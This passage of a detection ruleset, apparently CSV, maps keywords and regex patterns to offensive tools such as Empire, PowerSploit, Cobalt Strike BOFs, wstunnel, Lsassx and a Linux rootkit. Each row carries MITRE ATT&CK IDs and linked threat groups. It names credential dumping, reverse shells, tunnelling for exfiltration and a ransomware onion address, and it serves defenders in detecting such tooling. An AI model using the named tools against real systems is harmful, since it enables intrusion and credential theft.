Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63093"
"*Write-UserAddMSI*",".{0,1000}Write\-UserAddMSI.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","63094"
"*Write-UserAddServiceBinary*",".{0,1000}Write\-UserAddServiceBinary.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63095"
"*Write-Verbose (""Listening on [0.0.0.0] port*",".{0,1000}Write\-Verbose\s\(\""Listening\son\s\[0\.0\.0\.0\]\sport.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","63096"
"*writing-rootkit.txt*",".{0,1000}writing\-rootkit\.txt.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","63097"
"*Written by anthemtotheego & g0ldengunsec*",".{0,1000}Written\sby\santhemtotheego\s\&\sg0ldengunsec.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","63098"
"*ws://127.0.0.1:1339/yolo*",".{0,1000}ws\:\/\/127\.0\.0\.1\:1339\/yolo.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","N/A","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","63099"
"*ws://localhost:58082*",".{0,1000}ws\:\/\/localhost\:58082.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","63100"
"*WSAAcceptBackdoor-master.zip*",".{0,1000}WSAAcceptBackdoor\-master\.zip.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","1","N/A","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","63101"
"*wscript_elevator*",".{0,1000}wscript_elevator.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","63102"
"*WScriptBypassUAC*",".{0,1000}WScriptBypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1131","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","63103"
"*wsl kali-linux*",".{0,1000}wsl\skali\-linux.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","63104"
"*WSPCoerce.ex*",".{0,1000}WSPCoerce\.ex.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","63105"
"*WSPCoerce-main*",".{0,1000}WSPCoerce\-main.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","N/A","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","63106"
"*wstunnel client *",".{0,1000}wstunnel\sclient\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63109"
"*wstunnel server *",".{0,1000}wstunnel\sserver\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63110"
"*wstunnel* --restrict-to 127.0.0.1:22*",".{0,1000}wstunnel.{0,1000}\s\-\-restrict\-to\s127\.0\.0\.1\:22.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63111"
"*wstunnel*cert.pem*",".{0,1000}wstunnel.{0,1000}cert\.pem.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63112"
"*wstunnel*key.pem*",".{0,1000}wstunnel.{0,1000}key\.pem.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63113"
"*wstunnel.exe *",".{0,1000}wstunnel\.exe\s.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63114"
"*wstunnel/pkgs/container/wstunnel*",".{0,1000}wstunnel\/pkgs\/container\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63115"
"*wstunnel_*_darwin_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_darwin_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63116"
"*wstunnel_*_linux_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63117"
"*wstunnel_*_linux_arm64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_arm64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63118"
"*wstunnel_*_linux_armv7.tar.gz*",".{0,1000}wstunnel_.{0,1000}_linux_armv7\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63119"
"*wstunnel_*_windows_386.tar.gz*",".{0,1000}wstunnel_.{0,1000}_windows_386\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63120"
"*wstunnel_*_windows_amd64.tar.gz*",".{0,1000}wstunnel_.{0,1000}_windows_amd64\.tar\.gz.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","63121"
"*WSUSpendu*",".{0,1000}WSUSpendu.{0,1000}","offensive_tool_keyword","WSUSpendu","At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. to demonstrate this attack.","T1563 - T1204 - T1210 - T1071","TA0001 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AlsidOfficial/WSUSpendu","1","1","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A","63122"
"*wsuxploit*",".{0,1000}wsuxploit.{0,1000}","offensive_tool_keyword","wsuxploit","This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 'WSUSpect  Compromising the Windows Enterprise via Windows Update","T1557.001 - T1557.002 - T1573 - T1210.001","TA0001 - TA0002 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/pimps/wsuxploit","1","1","N/A","N/A","N/A","3","284","45","2022-11-25T10:04:15Z","2017-06-30T01:06:41Z","63123"
"*wts_enum_remote_processes*",".{0,1000}wts_enum_remote_processes.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","N/A","10","10","118","13","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z","63124"
"*wtXx6sM1482OWfsMXon6Am4Hi01idvFNgog3jTCsyAA=*",".{0,1000}wtXx6sM1482OWfsMXon6Am4Hi01idvFNgog3jTCsyAA\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","63125"
"*wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion*",".{0,1000}wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","63126"
"*wumb0/rust_bof*",".{0,1000}wumb0\/rust_bof.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/wumb0/rust_bof","1","1","N/A","N/A","10","10","262","27","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z","63127"
"*WwAhAF0AIABJAG4ALQBtAGUAbQBvAHIAeQAgAEwAUwBBAFMAUwAgAGQAdQBtAHAAIABtAGUAdABoAG8AZAAgAGYAYQBpAGwAZQBkADoAIAAkAF8A*",".{0,1000}WwAhAF0AIABJAG4ALQBtAGUAbQBvAHIAeQAgAEwAUwBBAFMAUwAgAGQAdQBtAHAAIABtAGUAdABoAG8AZAAgAGYAYQBpAGwAZQBkADoAIAAkAF8A.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63128"
"*WwAhAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAZgBhAGkAbABlAGQAIAB1AHMAaQBuAGcAIABzAHQAZQBhAGwAdABoACAAbQBlAHQAaABvAGQALgA=*",".{0,1000}WwAhAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAZgBhAGkAbABlAGQAIAB1AHMAaQBuAGcAIABzAHQAZQBhAGwAdABoACAAbQBlAHQAaABvAGQALgA\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63129"
"*WwAhAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAZgBhAGkAbABlAGQALgAgAEUAeABpAHQAaQBuAGcAIABzAGMAcgBpAHAAdAAuAA==*",".{0,1000}WwAhAF0AIABMAFMAQQBTAFMAIABkAHUAbQBwACAAZgBhAGkAbABlAGQALgAgAEUAeABpAHQAaQBuAGcAIABzAGMAcgBpAHAAdAAuAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63130"
"*WwAqAF0AIABBAHQAdABlAG0AcAB0AGkAbgBnACAAcwB0AGUAYQBsAHQAaAB5ACAATABTAEEAUwBTACAAZAB1AG0AcAAgAHUAcwBpAG4AZwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAByAGUAZgBsAGUAYwB0AGkAbwBuAC4ALgAuAA==*",".{0,1000}WwAqAF0AIABBAHQAdABlAG0AcAB0AGkAbgBnACAAcwB0AGUAYQBsAHQAaAB5ACAATABTAEEAUwBTACAAZAB1AG0AcAAgAHUAcwBpAG4AZwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAByAGUAZgBsAGUAYwB0AGkAbwBuAC4ALgAuAA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63131"
"*WwAqAF0AIABEAG8AbgBlAC4AIABDAGgAZQBjAGsAIAAkAHsAXwAvAD0AXABfAC8AXABfAF8ALwBcAF8ALwA9AFwALwA9AH0AIABmAG8AcgAgAHQAaABlACAAZgBpAG4AYQBsACAAYQByAGMAaABpAHYAZQAgAGkAZgAgAHMAdQBjAGMAZQBzAHMAZgB1AGwALgA=*",".{0,1000}WwAqAF0AIABEAG8AbgBlAC4AIABDAGgAZQBjAGsAIAAkAHsAXwAvAD0AXABfAC8AXABfAF8ALwBcAF8ALwA9AFwALwA9AH0AIABmAG8AcgAgAHQAaABlACAAZgBpAG4AYQBsACAAYQByAGMAaABpAHYAZQAgAGkAZgAgAHMAdQBjAGMAZQBzAHMAZgB1AGwALgA\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63132"
"*WwArAF0AIABDAG8AbQBwAHIAZQBzAHMAaQBvAG4AIABjAG8AbQBwAGwAZQB0AGUAZAA6ACAAJAB7AF8ALwA9AFwAXwAvAFwAXwBfAC8AXABfAC8APQBcAC8APQB9AA==*",".{0,1000}WwArAF0AIABDAG8AbQBwAHIAZQBzAHMAaQBvAG4AIABjAG8AbQBwAGwAZQB0AGUAZAA6ACAAJAB7AF8ALwA9AFwAXwAvAFwAXwBfAC8AXABfAC8APQBcAC8APQB9AA\=\=.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#base64","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","63133"
